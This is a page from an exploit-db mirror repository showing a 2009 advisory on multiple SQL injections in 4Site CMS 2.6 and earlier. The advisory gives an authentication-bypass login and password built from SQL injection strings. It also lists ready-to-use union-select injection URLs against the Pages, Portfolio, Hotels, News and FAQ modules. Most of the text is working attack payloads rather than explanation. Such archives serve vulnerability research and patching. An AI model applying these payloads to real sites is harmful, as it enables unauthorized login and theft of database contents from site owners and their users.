bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/7964.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

33 lines
No EOL
756 B
Text
Raw Blame History

[WSEC-09-002] 4Site CMS <= 2.6 Multiple Remote SQL Injections
Developer site: http://www.4site.ru/
Discovered by D.Mortalov // wsec.ru
1. Auth Bypass
Login: 1'or'1
Password: 1'or’1
2. Multiple Remote SQL Injections in 4site CMS modules
"Pages" module:
http://vulnerable.site/print/print.shtml?page=-1+union+select+1
"Portfolio" module:
http://vulnerable.site/portfolio/index.shtml?s=1&i=-1+union+select+1,2,3,4,5,6,7,8,9
http://vulnerable.site/portfolio/index.shtml?s=-1+union+select+1
"Hotels" module:
http://vulnerable.site/hotel/?h=-1+union+select+1
"News" module:
http://vulnerable.site/news/news1.shtml?id=-1+union+select+1,2,3,4
"FAQ" module:
http://vulnerable.site/faq/index.shtml?th=-1+union+select+1
# milw0rm.com [2009-02-03]
Reference in a new issue View git blame Copy permalink